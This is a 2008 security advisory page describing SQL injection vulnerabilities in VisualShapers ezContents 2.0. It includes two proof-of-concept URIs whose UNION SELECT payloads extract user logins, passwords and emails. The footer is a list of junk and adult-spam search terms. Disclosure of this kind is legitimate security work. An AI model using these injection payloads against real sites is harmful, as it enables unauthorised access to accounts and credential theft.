about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VisualShapers EzContents Multiple SQL Injection Vulnerabilities


Title VisualShapers EzContents Multiple SQL Injection Vulnerabilities
Published 2008-05-07-12:00AM
Updated 2008-05-07-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Virangar Security
Vulnerable  VisualShapers ezContents 2.0
Not Vulnerable  
Code  An attacker can exploit these issues using a web browser.The following proof-of-concept URIs are available:http://www.example.com/[patch]/showdetails.php?contentname='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
http://www.example.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:45:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
CMS is Fre get me sex ...th.org www.cg.yu sexcenima Sexy.pictu tamilsxc free seex sexmovies free seex 232694 CMS is Fre CMS is Fre free seex Linux Kern www.india. Www.18.com r75 sex video bebo signi www.hollyw arescom www.sex.wo tamil girl built2 AutoRank W.W.W.SEXS news for c Phorn Indian sex CMS is Fre clam WWW.18sex scripting t522t tcp TCP 61 www.aduld. phproxy+0. Horse fuck t206t shirlley b Extra exchange 2 www.aduld. www.waptrc news for c MS Exchang fuck vedeo Japanisex Pictures